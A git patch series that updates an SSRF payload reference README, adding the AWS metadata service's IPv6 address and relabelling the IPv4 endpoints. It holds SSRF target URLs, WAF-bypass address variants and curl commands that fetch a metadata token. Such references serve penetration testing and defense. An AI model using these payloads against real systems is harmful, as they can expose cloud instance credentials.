From bb3f865e1051b516df41e6788cfabb5356df0082 Mon Sep 17 00:00:00 2001
From: Jonathan Leitschuh <jonathan.leitschuh@gmail.com>
Date: Wed, 28 Jun 2023 18:51:53 -0400
Subject: [PATCH 1/2] Add new AWS IPv6 SSRF Endpoint

Documentation: https://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/instancedata-data-retrieval.html
---
 Server Side Request Forgery/README.md | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index db9ad9d..4b30650 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -557,6 +557,8 @@ The AWS Instance Metadata Service is a service available within Amazon EC2 insta
   curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data"
   ```
 
+* IPv6 endpoint: `http://[fd00:ec2::254]/latest/meta-data/` 
+
 In case of a WAF, you might want to try different ways to connect to the API.
 * DNS record pointing to the AWS API IP
   ```powershell
@@ -583,6 +585,7 @@ In case of a WAF, you might want to try different ways to connect to the API.
   http://[::ffff:a9fe:a9fe] IPV6 Compressed
   http://[0:0:0:0:0:ffff:a9fe:a9fe] IPV6 Expanded
   http://[0:0:0:0:0:ffff:169.254.169.254] IPV6/IPV4
+  http://[fd00:ec2::254] IPV6
   ```
 
 

From 97114171619e3c0fb33444aef4b218721c6ca593 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Thu, 29 Jun 2023 10:59:02 +0200
Subject: [PATCH 2/2] Update README.md

---
 Server Side Request Forgery/README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index 4b30650..3dd0a41 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -550,8 +550,8 @@ Example of a PDF attachment using HTML
 The AWS Instance Metadata Service is a service available within Amazon EC2 instances that allows those instances to access metadata about themselves. - [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
 
 
-* Old endpoint: `http://169.254.169.254/latest/meta-data/`
-* New endpoint requires the header `X-aws-ec2-metadata-token`
+* IPv4 endpoint (old): `http://169.254.169.254/latest/meta-data/`
+* IPv4 endpoint (new) requires the header `X-aws-ec2-metadata-token`
   ```powershell
   export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"`
   curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data"